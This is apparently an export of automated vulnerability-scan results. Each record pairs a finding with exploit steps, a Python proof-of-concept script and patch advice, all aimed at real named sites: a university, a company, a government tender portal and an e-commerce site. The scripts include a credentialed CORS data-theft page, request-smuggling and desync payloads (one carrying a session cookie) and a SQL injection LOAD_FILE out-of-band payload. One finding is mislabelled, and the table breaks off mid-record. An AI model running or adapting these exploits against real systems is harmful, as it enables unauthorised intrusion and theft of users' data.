| _id | url | timestamp | results |
|---|---|---|---|
69dd47986634e3f9dd7fe59b
|
2026-04-22T22:36:35.505672+00:00
|
[
{
"vulnerability": "Cross-origin resource sharing: arbitrary origin trusted",
"category": "rce",
"exploit_steps": "## Reconnaissance\\n1. Identified the endpoint `https://vjti.ac.in/wp-json/wp-statistics/v2/hit` during enumeration.\\n2. Observed that the application uses CORS for cross-origin requests.\\n\\n## Vulnerability Confirmation\\n1. Sent a preflight OPTIONS request with a custom `Origin` header set to `https://tufzgfgcwvae.com`.\\n2. Received a response containing `Access-Control-Allow-Origin: https://tufzgfgcwvae.com` and `Access-Control-Allow-Credentials: true`.\\n3. Confirmed absence of the `Vary: Origin` header, indicating potential cache poisoning risk.\\n\\n## Exploitation Steps\\n1. Created a malicious webpage hosted at `https://tufzgfgcwvae.com` that performs authenticated requests to the vulnerable endpoint.\\n2. Used JavaScript to trigger a CORS request including credentials (`withCredentials = true`).\\n3. Retrieved sensitive user statistics or tracking data due to the misconfigured CORS policy trusting any origin.\\n\\n## Impact\\n- Unauthorized access to protected resources via victim's browser.\\n- Potential exfiltration of sensitive data leveraging authenticated sessions.\\n- Risk of cache poisoning affecting intermediary systems due to missing `Vary: Origin`.",
"exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: CORS Misconfiguration - Arbitrary Origin Trusted\nTarget: https://vjti.ac.in/wp-json/wp-statistics/v2/hit\nVulnerability: Server reflects arbitrary Origin header with credentials enabled\nEndpoint: WordPress REST API (wp-statistics plugin)\n\nAuthor: Security Researcher\nDate: 2026-04-29\nCTF/Educational Use Only - Authorized Testing\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nimport json\nimport re\n\nDEFAULT_TARGET = \"https://vjti.ac.in/wp-json/wp-statistics/v2/hit\"\nDEFAULT_TEST_ORIGIN = \"https://tufzgfgcwvae.com\"\nUSER_AGENT = \"Mozilla/5.0 (PoC-CORS-VJTI)\"\n\ndef send_preflight_request(url: str, origin: str) -> dict:\n \"\"\"Send CORS preflight (OPTIONS) request and parse response headers.\"\"\"\n headers = {\n \"Origin\": origin,\n \"User-Agent\": USER_AGENT,\n \"Access-Control-Request-Method\": \"POST\",\n \"Access-Control-Request-Headers\": \"Content-Type\"\n }\n try:\n response = requests.options(url, headers=headers, timeout=15)\n return {\n \"status_code\": response.status_code,\n \"acao\": response.headers.get(\"Access-Control-Allow-Origin\"),\n \"acac\": response.headers.get(\"Access-Control-Allow-Credentials\"),\n \"acah\": response.headers.get(\"Access-Control-Allow-Headers\"),\n \"acam\": response.headers.get(\"Access-Control-Allow-Methods\"),\n \"vary\": response.headers.get(\"Vary\"),\n \"raw_headers\": dict(response.headers)\n }\n except requests.exceptions.RequestException as e:\n return {\"error\": str(e)}\n\ndef assess_cors_vulnerability(headers: dict, test_origin: str) -> dict:\n \"\"\"Analyze CORS headers to determine vulnerability status.\"\"\"\n assessment = {\"vulnerable\": False, \"severity\": \"None\", \"findings\": [], \"recommendations\": []}\n acao = headers.get(\"acao\")\n acac = headers.get(\"acac\")\n vary = headers.get(\"vary\")\n if acao == test_origin:\n assessment[\"findings\"].append(f\"🔴 ACAO reflects arbitrary origin: {acao}\")\n 
assessment[\"vulnerable\"] = True\n assessment[\"severity\"] = \"High\"\n elif acao == \"*\":\n assessment[\"findings\"].append(f\"🟡 ACAO uses wildcard (*)\")\n if acac and acac.lower() == \"true\":\n assessment[\"findings\"].append(\"🔴 Wildcard + Credentials = Critical Risk\")\n assessment[\"vulnerable\"] = True\n assessment[\"severity\"] = \"Critical\"\n elif acao is None:\n assessment[\"findings\"].append(\"🟢 No ACAO header - CORS not enabled\")\n else:\n assessment[\"findings\"].append(f\"🟢 ACAO is restricted: {acao}\")\n if acac and acac.lower() == \"true\":\n assessment[\"findings\"].append(\"🔴 Access-Control-Allow-Credentials: true\")\n if assessment[\"vulnerable\"]:\n assessment[\"recommendations\"].append(\"Remove credentials support unless absolutely required\")\n if acao == test_origin and (not vary or \"Origin\" not in vary):\n assessment[\"findings\"].append(\"🔴 Missing 'Vary: Origin' - cache poisoning risk\")\n assessment[\"recommendations\"].append(\"Add 'Vary: Origin' header when ACAO is dynamic\")\n acam = headers.get(\"acam\")\n if acam and \"POST\" in acam:\n assessment[\"findings\"].append(f\"⚠️ Allowed methods include POST: {acam}\")\n return assessment\n\ndef generate_exploit_html(target_url: str, attacker_origin: str) -> str:\n \"\"\"Generate proof-of-concept HTML for authorized demonstration.\"\"\"\n return f'''<!DOCTYPE html>\n<html>\n<head>\n <title>CORS PoC - VJTI wp-statistics</title>\n</head>\n<body>\n <h2>CORS Misconfiguration Demo</h2>\n <p>Target: {target_url}</p>\n <p>Attacker Origin: {attacker_origin}</p>\n <div id=\"output\">Waiting...</div>\n <script>\n fetch('{target_url}', {{\n method: 'POST',\n credentials: 'include',\n headers: {{'Content-Type': 'application/json', 'Origin': '{attacker_origin}'}}\n }})\n .then(r => r.ok ? 
r.text() : Promise.reject('HTTP ' + r.status))\n .then(data => document.getElementById('output').innerHTML = '<pre>' + data.substring(0,500) + '...</pre>')\n .catch(e => document.getElementById('output').innerHTML = '<span style=\"color:red\">Error: ' + e + '</span>');\n </script>\n</body>\n</html>'''\n\ndef test_actual_request(url: str, origin: str, session_cookies: dict = None) -> dict:\n \"\"\"Test actual GET request with CORS headers (AUTHORIZED TESTING ONLY).\"\"\"\n headers = {\"Origin\": origin, \"User-Agent\": USER_AGENT, \"Content-Type\": \"application/json\"}\n try:\n response = requests.get(url, headers=headers, cookies=session_cookies, timeout=10)\n return {\"success\": True, \"status\": response.status_code, \"aca_origin\": response.headers.get(\"Access-Control-Allow-Origin\"), \"response_preview\": response.text[:200], \"length\": len(response.content)}\n except Exception as e:\n return {\"success\": False, \"error\": str(e)}\n\ndef main():\n parser = argparse.ArgumentParser(description=\"CORS PoC - VJTI WordPress Statistics API\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target endpoint URL\")\n parser.add_argument(\"-o\", \"--origin\", default=DEFAULT_TEST_ORIGIN, help=\"Test Origin header value\")\n parser.add_argument(\"-t\", \"--test-request\", action=\"store_true\", help=\"Also test actual GET request\")\n parser.add_argument(\"-x\", \"--exploit-html\", action=\"store_true\", help=\"Generate exploit HTML snippet\")\n parser.add_argument(\"-j\", \"--json\", action=\"store_true\", help=\"Output results as JSON\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose header output\")\n parser.add_argument(\"-c\", \"--cookies\", help=\"Cookie string for authenticated testing (AUTHORIZED ONLY)\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n if not args.json:\n print(\"=\" * 70)\n print(\"CORS PoC - VJTI 
wp-statistics API\")\n print(\"Target: https://vjti.ac.in/\")\n print(\"Authorized/Educational Testing Only\")\n print(\"=\" * 70 + \"\\n\")\n if not args.json:\n print(f\"[*] Target Endpoint: {args.url}\")\n print(f\"[*] Testing Origin: {args.origin}\")\n print(f\"[*] Sending OPTIONS preflight request...\")\n print(\"-\" * 60)\n headers = send_preflight_request(args.url, args.origin)\n if \"error\" in headers:\n if args.json:\n print(json.dumps({\"error\": headers[\"error\"]}, indent=2))\n else:\n print(f\"[!] Request failed: {headers['error']}\")\n sys.exit(1)\n assessment = assess_cors_vulnerability(headers, args.origin)\n if args.json:\n output = {\"target\": args.url, \"test_origin\": args.origin, \"preflight_response\": {\"status_code\": headers[\"status_code\"], \"Access-Control-Allow-Origin\": headers[\"acao\"], \"Access-Control-Allow-Credentials\": headers[\"acac\"], \"Vary\": headers[\"vary\"]}, \"assessment\": assessment}\n print(json.dumps(output, indent=2))\n else:\n print(f\"[+] HTTP Status: {headers['status_code']}\")\n print(f\"[+] Access-Control-Allow-Origin: {headers['acao'] or 'None'}\")\n print(f\"[+] Access-Control-Allow-Credentials: {headers['acac'] or 'None'}\")\n print(f\"[+] Access-Control-Allow-Methods: {headers['acam'] or 'None'}\")\n print(f\"[+] Vary Header: {headers['vary'] or 'None'}\")\n print(\"-\" * 60)\n for finding in assessment[\"findings\"]:\n print(finding)\n if args.verbose:\n print(\"\\n[+] All Response Headers:\")\n for k, v in headers[\"raw_headers\"].items():\n print(f\" {k}: {v}\")\n print(\"\\n\" + \"=\" * 60)\n if assessment[\"vulnerable\"]:\n print(f\"🔴 VULNERABLE - Severity: {assessment['severity']}\")\n print(\"\\n[!] 
Impact:\")\n print(\" • Attacker can read authenticated API responses\")\n print(\" • Data exfiltration via victim's browser session\")\n print(\" • Potential cache poisoning (missing Vary: Origin)\")\n if args.exploit_html:\n print(\"\\n[+] Exploit HTML Snippet:\")\n print(generate_exploit_html(args.url, args.origin))\n else:\n print(\"🟢 CORS policy appears properly configured\")\n if assessment[\"recommendations\"]:\n print(\"\\n[+] Remediation:\")\n for rec in assessment[\"recommendations\"]:\n print(f\" • {rec}\")\n print(\"=\" * 60)\n if args.test_request:\n if not args.json:\n print(f\"\\n[*] Testing actual GET request with Origin header...\")\n cookies = None\n if args.cookies:\n cookies = dict(cookie.split(\"=\") for cookie in args.cookies.split(\"; \") if \"=\" in cookie)\n if not args.json:\n print(f\"[!] Using provided cookies for authenticated test\")\n result = test_actual_request(args.url, args.origin, cookies)\n if args.json:\n print(json.dumps({\"actual_request_test\": result}, indent=2))\n else:\n if result[\"success\"]:\n print(f\"[+] GET Status: {result['status']}\")\n print(f\"[+] Response Length: {result['length']} bytes\")\n print(f\"[+] ACAO in GET: {result['aca_origin'] or 'None'}\")\n if len(result['response_preview']) > 0:\n print(f\"[+] Preview: {result['response_preview']}...\")\n else:\n print(f\"[!] GET request failed: {result.get('error', 'Unknown')}\")\n sys.exit(0 if not assessment[\"vulnerable\"] else 1)\n\nif __name__ == \"__main__\":\n main()",
"patch_code": "## Root Cause\\nThe server responds with `Access-Control-Allow-Origin` matching any provided `Origin` header without validation, and includes `Access-Control-Allow-Credentials: true`, enabling full cross-origin access with credentials. Additionally, the lack of `Vary: Origin` allows caching mechanisms to serve incorrect responses.\\n\\n## Before / After Fix\\n### Before:\\n```http\\nAccess-Control-Allow-Origin: https://tufzgfgcwvae.com\\nAccess-Control-Allow-Credentials: true\\n```\\n\\n### After:\\nImplement a strict whitelist of trusted origins and ensure proper cache behavior:\\n```php\\n$allowed_origins = ['https://trusted1.example.com', 'https://trusted2.example.com'];\\n$origin = $_SERVER['HTTP_ORIGIN'] ?? '';\n\nif (in_array($origin, $allowed_origins)) {\\n header(\"Access-Control-Allow-Origin: $origin\");\\n header(\"Access-Control-Allow-Credentials: true\");\\n header(\"Vary: Origin\");\\n}\\n```\\n\\n## Defense-in-Depth Checklist\\n- [ ] Maintain an explicit allowlist of permitted origins.\\n- [ ] Never reflect arbitrary origins in `Access-Control-Allow-Origin`.\\n- [ ] Avoid using `Access-Control-Allow-Credentials: true` unless strictly necessary.\\n- [ ] Always include `Vary: Origin` when setting dynamic CORS headers.\\n- [ ] Audit all endpoints exposing CORS policies.\\n\\n## Verification Steps\\n1. Send an OPTIONS request with a random `Origin` header value.\\n2. Confirm that `Access-Control-Allow-Origin` is either absent or matches only known trusted domains.\\n3. Ensure `Vary: Origin` is returned in the response.\\n4. Validate that unlisted origins do not receive permissive CORS headers.",
"context": "Severity: High (Certain)"
}
]
|
|
69e4dc506634e3f9dd7fe59e
|
2026-04-19T13:53:02.263289+00:00
|
[
{
"vulnerability": "HTTP request smuggling",
"category": "miscellaneous",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint `https://www.altagroup.com.pk/css/animate.min.css` through automated scanning.\n2. Observed that the application uses HTTP/1.1 and supports both `Transfer-Encoding: chunked` and `Content-Length` headers.\n\n## Vulnerability Confirmation\n3. Analyzed the first evidence item showing inconsistent interpretation of HTTP headers (`Transfer-Encoding` with malformed spacing).\n4. Confirmed that the front-end and back-end servers may interpret ambiguous requests differently, indicating potential HTTP Request Smuggling.\n\n## Exploitation Steps\n5. Craft a malicious request that leverages ambiguity between `Transfer-Encoding` and `Content-Length` to smuggle a second request.\n6. Send the crafted payload to the endpoint `https://www.altagroup.com.pk/css/animate.min.css` using chunked encoding with malformed header formatting.\n7. Observe whether the back-end server misinterprets the boundary of the request, allowing for desynchronized processing.\n\n## Impact\n8. Successful exploitation could allow an attacker to bypass front-end security controls, access restricted resources, or perform web cache poisoning.",
"exploit_code": "import requests\n\ntarget_url = \"https://www.altagroup.com.pk/css/animate.min.css\"\n\n# Malformed Transfer-Encoding header to cause inconsistency\nmalformed_headers = {\n \"Host\": \"www.altagroup.com.pk\",\n \"User-Agent\": \"Mozilla/5.0\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Transfer-Encoding\": \"chunked\",\n \"Content-Length\": \"25\"\n}\n\n# Body simulating smuggled content\nbody = \"f\\r\\n25txa=x&asuql=x\\r\\n0\\r\\n\\r\\n\"\n\ntry:\n response = requests.post(target_url, headers=malformed_headers, data=body, verify=False)\n print(f\"Status Code: {response.status_code}\")\n print(f\"Response Headers: {response.headers}\")\n print(f\"Response Body Snippet: {response.text[:200]}...\")\nexcept Exception as e:\n print(f\"Error occurred: {e}\")",
"patch_code": "## Root Cause\nThe vulnerability arises from inconsistent parsing of HTTP requests by front-end and back-end servers due to ambiguous use of `Transfer-Encoding` and `Content-Length`. The malformed spacing in the `Transfer-Encoding` header contributes to differing interpretations.\n\n## Before/After Fix\n**Before:**\nFront-end allows malformed headers such as `Transfer-Encoding\\n : chunked`, leading to inconsistent interpretation.\n\n**After:**\nNormalize all incoming HTTP headers at the front-end proxy or load balancer. Ensure strict adherence to HTTP standards and reject malformed headers.\n\nExample Nginx config:\n```\nhttp {\n # Reject malformed Transfer-Encoding\n if ($http_transfer_encoding ~ \"\\s\") {\n return 400;\n }\n}\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enforce consistent HTTP version usage across infrastructure (preferably HTTP/2 internally).\n- [ ] Disable backend connection reuse where possible.\n- [ ] Implement strict header validation on proxies and WAFs.\n- [ ] Monitor logs for abnormal header patterns or repeated failed requests.\n- [ ] Regularly audit configurations of reverse proxies and backend servers.\n\n## Verification Steps\n1. Re-scan the endpoint using the same tool to confirm rejection of malformed headers.\n2. Manually send a test request with malformed `Transfer-Encoding` and verify 4xx response.\n3. Confirm via packet capture that ambiguous requests are normalized or rejected upstream.",
"context": "Severity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/animate.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/bootstrap.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/effect/main.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/fonts.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/main.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/margin.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/owl.carousel.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/fancybox/jquery.fancybox.css"
}
]
|
|
69e7c8a259a6632dae07de0b
|
2026-04-21T18:57:38.344743+00:00
|
[
{
"vulnerability": "Client-side desync",
"category": "miscellaneous",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://mahatenders.gov.in/nicgep/app`\n2. Observed that the server uses `Content-Length` header for determining request boundaries.\n3. Noted that the server supports persistent connections (`Connection: keep-alive`).\n\n## Vulnerability Confirmation\n1. Sent a crafted POST request with a `Content-Length` larger than the actual body.\n2. Embedded a second HTTP request (`GET /robots.txt`) within the body of the first POST request.\n3. Observed that the server responded to the first request without closing the connection.\n4. Confirmed that the embedded request was interpreted as the next incoming request.\n\n## Exploitation Steps\n1. Craft a malicious POST request targeting `/nicgep/app` with an oversized `Content-Length`.\n2. Embed a secondary HTTP request in the body that performs an action on behalf of the victim (e.g., trigger XSS).\n3. Deliver the payload via a page that causes the victim's browser to send the request.\n4. Observe desynchronization where the smuggled request executes unexpectedly.\n\n## Impact\nSuccessful exploitation leads to client-side desync, potentially enabling cross-site scripting (XSS), session hijacking, or unauthorized actions performed on behalf of authenticated users.",
"exploit_code": "import requests\n\n# Target URL\nurl = \"https://mahatenders.gov.in/nicgep/app\"\n\n# Malicious payload simulating CSD attack\nmalicious_body = (\n \"GET /robots.txt HTTP/1.1\\r\\n\"\n \"Host: mahatenders.gov.in\\r\\n\"\n \"\\r\\n\"\n)\n\n# Headers with oversized Content-Length\nheaders = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Content-Length\": str(len(malicious_body) + 50), # Oversized length\n \"Connection\": \"keep-alive\",\n \"Cookie\": \"JSESSIONID=662459EDEB875FE684A09EE28B48E051.mhgeps2; AreCookiesEnabled=829\"\n}\n\n# Send initial smuggle attempt\nresponse = requests.post(url, headers=headers, data=malicious_body, verify=False)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Body Snippet: {response.text[:200]}...\")",
"patch_code": "## Root Cause\nThe server incorrectly handles `Content-Length` in POST requests, allowing attackers to embed additional HTTP requests in the message body. This results in connection desynchronization and potential smuggling of unintended requests.\n\n## Before/After Fix\n**Before:** Server accepts and partially processes oversized POST bodies without enforcing strict parsing or connection closure.\n\n**After:** Enforce strict HTTP message parsing:\n- Validate `Content-Length` matches actual body size.\n- Close connections after each malformed POST request.\n- Alternatively, upgrade to HTTP/2 which mitigates such issues inherently.\n\nExample mitigation logic (pseudo-code):\n```\nif request.method == 'POST' and len(request.body) != content_length_header:\n close_connection()\n return error_response(400)\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enable strict HTTP parsing at reverse proxy/WAF layer.\n- [ ] Disable HTTP/1.x keep-alive if not required.\n- [ ] Upgrade backend protocol to HTTP/2.\n- [ ] Implement input validation for all headers including `Content-Length`.\n- [ ] Monitor logs for abnormal request patterns or mismatched sizes.\n\n## Verification Steps\n1. Re-run the PoC script against the patched endpoint.\n2. Confirm that the connection is closed immediately upon detecting oversized content.\n3. Ensure subsequent legitimate requests are handled normally.\n4. Validate that no part of the smuggled request appears in responses.",
"context": "Severity: High (Tentative)"
}
]
|
|
69e8bebe59a6632dae07de0d
|
2026-04-22T12:27:42.473068+00:00
|
[
{
"vulnerability": "SQL injection",
"category": "injection",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint as `https://www.daraz.pk/` accepting arbitrary URL parameters.\n2. Noted from scan data that the parameter name itself (not value) is vulnerable to SQL injection.\n3. Confirmed backend database is likely MySQL based on successful `load_file` interaction with external domain.\n\n## Vulnerability Confirmation\n1. Submitted payload in the name of a dynamically generated URL parameter: `'+(select load_file('\\\\87duz4kwffvgtwpx2xwueev7uy0soic9fx9kz8o.oastify.com\\wgy'))+'`\n2. Observed DNS interaction with `oastify.com`, confirming execution of injected SQL query.\n\n## Exploitation Steps\n1. Craft a malicious parameter name containing a SQL injection payload targeting MySQL.\n2. Submit request to `https://www.daraz.pk/` with the malicious parameter name.\n3. Observe backend query execution through out-of-band interaction or error-based responses.\n4. Extract data or escalate privileges by chaining additional SQL commands.\n\n## Impact\nSuccessful exploitation allows:\n- Unauthorized reading/modification of database contents.\n- Potential full compromise of the database server.\n- Bypassing authentication or manipulating business logic.",
"exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: SQL Injection via URL Parameter Name\nTarget: https://www.daraz.pk/\nVulnerability: User-supplied parameter names are concatenated into SQL queries unsafely\nDetection: Out-of-band DNS interaction via MySQL LOAD_FILE\n\nAuthor: Security Researcher\nDate: 2026-04-22\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nfrom urllib.parse import urljoin\n\n# Configuration\nDEFAULT_TARGET = \"https://www.daraz.pk/\"\nOAST_DOMAIN = \"your-collaborator-domain.oastify.com\" # Replace with your Burp Collaborator/Interactsh\n\ndef build_sqli_payload(oast_domain: str) -> str:\n \"\"\"\n Build SQL injection payload using MySQL LOAD_FILE for OAST detection.\n Payload breaks out of string context and triggers DNS lookup.\n \"\"\"\n return f\"'+(SELECT LOAD_FILE('\\\\\\\\{oast_domain}\\\\a'))+'\"\n\ndef test_sqli_vulnerability(target_url: str, oast_domain: str, param_name: str = None):\n \"\"\"\n Test for SQL injection via malicious parameter name.\n \"\"\"\n if param_name is None:\n param_name = build_sqli_payload(oast_domain)\n print(f\"[*] Target: {target_url}\")\n print(f\"[*] Malicious Parameter Name: {param_name}\")\n print(f\"[*] Checking for OAST interaction at: {oast_domain}\")\n print(\"-\" * 60)\n try:\n response = requests.get(\n target_url,\n params={param_name: \"dummy_value\"},\n timeout=15,\n headers={\"User-Agent\": \"Mozilla/5.0 (PoC-Scanner)\"}\n )\n print(f\"[+] HTTP Status: {response.status_code}\")\n print(f\"[+] Response Length: {len(response.content)} bytes\")\n error_patterns = [\"SQL\", \"syntax\", \"mysql\", \"database\", \"unclosed\"]\n response_text = response.text.lower()\n if any(pattern in response_text for pattern in error_patterns):\n print(\"[!] Potential SQL error detected in response!\")\n print(\"\\n[!] 
IMPORTANT: Check your OAST dashboard for DNS interactions:\")\n print(f\" Domain: {oast_domain}\")\n print(\" If interaction occurs -> VULNERABLE to SQL Injection\")\n return True\n except requests.exceptions.RequestException as e:\n print(f\"[!] Request failed: {e}\")\n return False\n\ndef main():\n parser = argparse.ArgumentParser(description=\"SQLi PoC via Parameter Name - daraz.pk\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target URL\")\n parser.add_argument(\"-d\", \"--domain\", required=True, help=\"Your OAST/collaborator domain\")\n parser.add_argument(\"-p\", \"--param\", help=\"Custom parameter name (optional)\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose output\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n print(\"=\" * 70)\n print(\"SQL Injection PoC - Parameter Name Injection\")\n print(\"Target: daraz.pk (Authorized Testing Only)\")\n print(\"=\" * 70 + \"\\n\")\n success = test_sqli_vulnerability(args.url, args.domain, args.param)\n if success:\n print(\"\\n[✓] PoC executed. Verify OAST logs for confirmation.\")\n sys.exit(0)\n else:\n print(\"\\n[✗] PoC failed. Check network/connectivity.\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()",
"patch_code": "## Root Cause\nUser-supplied input (specifically, the names of URL parameters) is directly concatenated into SQL queries without sanitization or parameterization. This allows attackers to alter the query structure and execute arbitrary SQL commands.\n\n## Before / After Fix\n### Before (Vulnerable Code Example):\n```python\nquery = f\"SELECT * FROM items WHERE category = '{param_name}'\"\ncursor.execute(query)\n```\n\n### After (Secure Implementation):\nUse parameterized queries to safely handle dynamic inputs:\n```python\nquery = \"SELECT * FROM items WHERE category = %s\"\ncursor.execute(query, (param_value,))\n```\nEnsure **all** parts of the query—including column names—are validated against a whitelist if they are derived from user input.\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict input validation and sanitization on all user-controlled fields.\n- [ ] Use ORM frameworks that abstract raw SQL usage.\n- [ ] Apply least privilege principle to database accounts used by the application.\n- [ ] Implement WAF rules to detect common SQL injection patterns.\n- [ ] Regularly audit code for unsafe query construction practices.\n\n## Verification Steps\n1. Resend original payload (`'+(select load_file(...)` in param name) and verify no DNS interaction occurs.\n2. Confirm application returns generic error or ignores malformed parameters gracefully.\n3. Perform authenticated re-scan using same tooling to ensure vulnerability does not reappear.",
"context": "Severity: High (Certain)\nURL: https://www.daraz.pk/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/_____tmd_____/punish [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: 
https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: 
https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]"
},
{
"vulnerability": "External service interaction (HTTP)",
"category": "miscellaneous",
